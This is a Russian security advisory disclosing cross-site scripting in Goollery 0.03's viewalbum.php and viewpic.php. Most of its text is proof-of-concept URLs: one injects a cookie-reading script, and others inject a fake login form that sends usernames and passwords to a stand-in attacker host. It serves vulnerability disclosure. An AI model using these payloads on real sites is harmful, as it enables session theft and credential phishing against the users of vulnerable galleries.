Программа: Goollery 0.03 

Обнаружено межсайтовое выполнение сценариев в Goollery. Удаленный атакующий может получить доступ к важной информации пользователей.
Уязвимость существует из-за некорректной фильтрации входных данных в сценариях 'viewalbum.php' and 'viewpic.php'. Удаленный атакующий может создать специально сформированный URL, который выполнит произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Примеры:

http://[TARGET]/goollery/viewalbum.php?conversation_id =ffee00b71f3931a&page=[XSS-CODE]&sess=daf5c642ad
e1162f15c4eb4b7e89da17 

http://[TARGET]/goollery/viewalbum.php?conversation_id =ffee00b71f3931a&page=<body>XSS%20poW@!!<script>
alert(document.cookie)</script></body>&sess=daf5c642ad
e1162f15c4eb4b7e89da17

http://[TARGET]/goollery/viewalbum.php?conversation_id =ffee00b71f3931a&page=<form%20action="http://www.ata
cker.com/save2db.asp"%20method="post">Username:<input
%20name="username"%20type="text"%20maxlength="30"> <br>Password:<input%20name="password"%20type="text"
%20maxlength="30"><br><input%20name="login"%20type
="submit"%20value="Login"></form>&sess=daf5c642ade1
162f15c4eb4b7e89da17

http://[TARGET]/goollery/viewalbum.php?conversation_id =ffee00b71f3931a&page=<body>XSS%20poW@!!</body>
&sess=daf5c642ade1162f15c4eb4b7e89da17

http://[TARGET]/goollery/viewpic.php?id=2&conversation _id=ffee00b71f3931a&btopage=<form%20action="http://ww
w.atacker.com/save2db.asp"%20method="post">Username: <input%20name="username"%20type="text"%20maxlength=
"30"><br>Password:<input%20name="password"%20type=
"text"%20maxlength="30"><br><input%20name="login"%20
type="submit"%20value="Login"></form>http://[TARGET]/
goollery/viewalbum.php?conversation_id=ffee00b71f3931a& page=<body>XSS%20poW@!!</body>&sess=daf5c642ade1
162f15c4eb4b7e89da17

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии